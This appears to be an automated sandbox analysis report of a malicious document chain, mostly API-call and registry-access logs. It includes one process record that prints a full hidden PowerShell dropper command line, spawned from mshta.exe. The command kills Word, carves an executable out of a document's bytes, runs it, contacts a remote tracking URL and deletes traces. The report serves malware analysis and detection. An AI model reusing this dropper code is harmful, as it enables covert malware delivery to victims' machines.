| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Module | Load | module_name = oleaut32.dll, base_address = 0x7fefde70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\oleaut32.dll, function = VariantClear, address_out = 0x7fefde71180 |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551600, new_long = 18446744071609188352 |
|
1 | |
| Window | Set Attribute | class_name = HTML Application Host Window Class, index = 18446744073709551596, new_long = 262144 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| System | Get Cursor | x_out = 631, y_out = 286 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LCONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LMENU, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_LBUTTON, result_out = 1 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_RBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_CONTROL, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MBUTTON, result_out = 0 |
|
1 | |
| Keyboard | Read | virtual_key_code = VK_MENU, result_out = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x7feff5e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\wininet.dll, function = InternetUnlockRequestFile, address_out = 0x7feff5f70f4 |
|
1 | |
| Module | Get Handle | module_name = mscoree.dll, base_address = 0x0 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = mshtml.dll, base_address = 0x7fee0880000 |
|
1 | |
| System | Get Time | type = Ticks, time = 131992 |
|
1 | |
| System | Get Time | type = Ticks, time = 132008 |
|
1 | |
| System | Get Time | type = Ticks, time = 147686 |
|
2 |
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe" -WindowStyle Hidden Try{$ada="""$env:APPDATA\result.exe""";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf="""$env:TEMP\o.tmp""";taskkill /f /im winword.exe;Function pr{Try{$k="""HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency\StartupItems\""";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path """HKCU:\Software\Microsoft\Office\$wv\Word\Resiliency""" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword """$r""";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\).Path;ri """$cd\*""" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;} |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:36, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:29 |
| Information | Value |
|---|---|
| PID | 0x664 |
| Parent PID | 0xbc8 (c:\windows\system32\mshta.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
768
0x
610
0x
A18
0x
A08
0x
99C
0x
998
0x
94C
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.Exe, size = 2048 |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\SYSteM32\windowspOweRSHeLL\V1.0\PoWErSHELL.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
10 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| File | Get Info | type = file_type |
|
2 | |
| File | Read | size = 4096, size_out = 4096 |
|
3 | |
| File | Read | size = 4096, size_out = 3315 |
|
1 | |
| File | Read | size = 781, size_out = 0 |
|
1 | |
| File | Read | size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| File | Get Info | type = file_type |
|
1 | |
| File | Read | size = 4096, size_out = 4096 |
|
41 | |
| File | Read | size = 4096, size_out = 436 |
|
1 | |
| File | Read | size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| File | Get Info | type = file_type |
|
1 | |
| File | Read | size = 4096, size_out = 4096 |
|
6 | |
| File | Read | size = 4096, size_out = 2530 |
|
1 | |
| File | Read | size = 542, size_out = 0 |
|
1 | |
| File | Read | size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096 |
|
41 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
